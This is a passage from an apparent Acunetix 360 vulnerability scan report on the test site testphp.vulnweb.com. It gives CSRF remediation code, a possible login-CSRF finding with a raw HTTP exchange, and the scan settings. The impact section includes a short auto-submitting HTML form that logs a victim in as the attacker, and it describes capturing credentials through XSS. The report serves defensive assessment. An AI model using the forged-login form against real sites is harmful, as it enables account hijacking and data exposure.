  • If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.

    • For native XMLHttpRequest (XHR) object in JavaScript; 
      xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL');
      For JQuery, if you want to add a custom header (or set of headers) to

      a. individual request

      $.ajax({
    url: 'foo/bar',
    headers: { 'x-my-custom-header': 'some value' }
});

       

      b. every request

      $.ajaxSetup({
    headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
    beforeSend: function(xhr) {
        xhr.setRequestHeader('x-my-custom-header', 'some value');
    }
});

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.9

13. [Possible] Cross-site Request Forgery in Login Form

LOW
1

Acunetix 360 identified a possible Cross-Site Request Forgery in Login Form.

In a login CSRF attack, the attacker forges a login request to an honest site using the attacker’s user name and password at that site. If the forgery succeeds, the honest server responds with a Set-Cookie header that instructs the browser to mutate its state by storing a session cookie, logging the user into the honest site as the attacker. This session cookie is used to bind subsequent requests to the user’s session and hence to the attacker’s authentication credentials. The attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.

Impact

In this particular case CSRF affects the login form in which the impact of this vulnerability is decreased significantly. Unlike normal CSRF vulnerabilities this will only allow an attacker to exploit some complex XSS vulnerabilities otherwise it can't be exploited.

For example;

If there is a page that's different for every user (such as "edit my profile") and vulnerable to XSS (Cross-site Scripting) then normally it cannot be exploited. However if the login form is vulnerable, an attacker can prepare a special profile, force victim to login as that user which will trigger the XSS exploit. Again attacker is still quite limited with this XSS as there is no active session. However the attacker can leverage this XSS in many ways such as showing the same login form again but this time capturing and sending the entered username/password to the attacker.

In this kind of attack, attacker will send a link containing html as simple as the following in which attacker's user name and password is attached.

<form method="POST" action="http://honest.site/login">
  <input type="text" name="user" value="h4ck3r" />
  <input type="password" name="pass" value="passw0rd" />
</form>
<script>
    document.forms[0].submit();
</script>

When the victim clicks the link then form will be submitted automatically to the honest site and exploitation is successful, victim will be logged in as the attacker and consequences will depend on the website behavior.

  • Search History

    Many sites allow their users to opt-in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user’s interests and activities and could be used by the attacker to embarrass the user, to steal the user’s identity, or to spy on the user. Since the victim logs in as the attacker, the victim's search queries are then stored in the attacker’s search history, and the attacker can retrieve the queries by logging into his or her own account.

  • Shopping

    Merchant sites might save the credit card details in user's profile. In login CSRF attack, when user funds a purchase and enrolls the credit card, the credit card details might be added to the attacker's account.

Vulnerabilities

13.1. http://testphp.vulnweb.com/login.php

Form Name(s)

  • loginform

Certainty



Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 196.098
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


ntent -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<div class="story">
	<h3>If you are already registered please enter your login information below:</h3><br>
	<form name="loginform" method="post" action="userinfo.php">
	<table cellpadding="4" cellspacing="1">
		<tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr>
		<tr><td>Passwo

Remedy

  • Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.

  • If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.

    • For native XMLHttpRequest (XHR) object in JavaScript; 
      xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL);
      For JQuery, if you want to add a custom header (or set of headers) to

      a. individual request

      $.ajax({
    url: 'foo/bar',
    headers: { 'x-my-custom-header': 'some value' }
});

       

      b. every request

      $.ajaxSetup({
    headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
    beforeSend: function(xhr) {
        xhr.setRequestHeader('x-my-custom-header', 'some value');
    }
});

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.9
Enabled Security Checks : BREACH Attack,
Code Evaluation,
Code Evaluation (Out of Band),
Command Injection,
Command Injection (Blind),
Content Security Policy,
Content-Type Sniffing,
Cookie,
Cross Frame Options Security,
Cross-Origin Resource Sharing (CORS),
Cross-Site Request Forgery,
Cross-site Scripting,
Cross-site Scripting (Blind),
Drupal Remote Code Execution,
Expect Certificate Transparency (Expect-CT),
File Upload,
Header Analyzer,
Heartbleed,
HSTS,
HTML Content,
HTTP Header Injection,
HTTP Methods,
HTTP Status,
IFrame Security,
Insecure JSONP Endpoint,
Insecure Reflected Content,
JavaScript Libraries,
Local File Inclusion,
Login Page Identifier,
Malware Analyzer,
Mixed Content,
Open Redirection,
Referrer Policy,
Reflected File Download,
Remote File Inclusion,
Remote File Inclusion (Out of Band),
Reverse Proxy Detection,
Server-Side Request Forgery (DNS),
Server-Side Request Forgery (Pattern Based),
Server-Side Template Injection,
Signatures,
SQL Injection (Blind),
SQL Injection (Boolean),
SQL Injection (Error Based),
SSL,
Static Resources (All Paths),
Unicode Transformation (Best-Fit Mapping),
WAF Identifier,
Web App Fingerprint,
Web Cache Deception,
XML External Entity,
XML External Entity (Out of Band)
URL Rewrite Mode : Heuristic
Detected URL Rewrite Rule(s) : None
Excluded URL Patterns : gtm\.js
WebResource\.axd
ScriptResource\.axd
Authentication : None
Scheduled : No
Additional Website(s) :

None
Scan Policy : PHP
Report Policy : Default Report Policy
Scope : Entered Path and Below
Scan Type : Full
Max Scan Duration : 48 hour(s)

This report created with 1.9.3.0
https://www.acunetix.com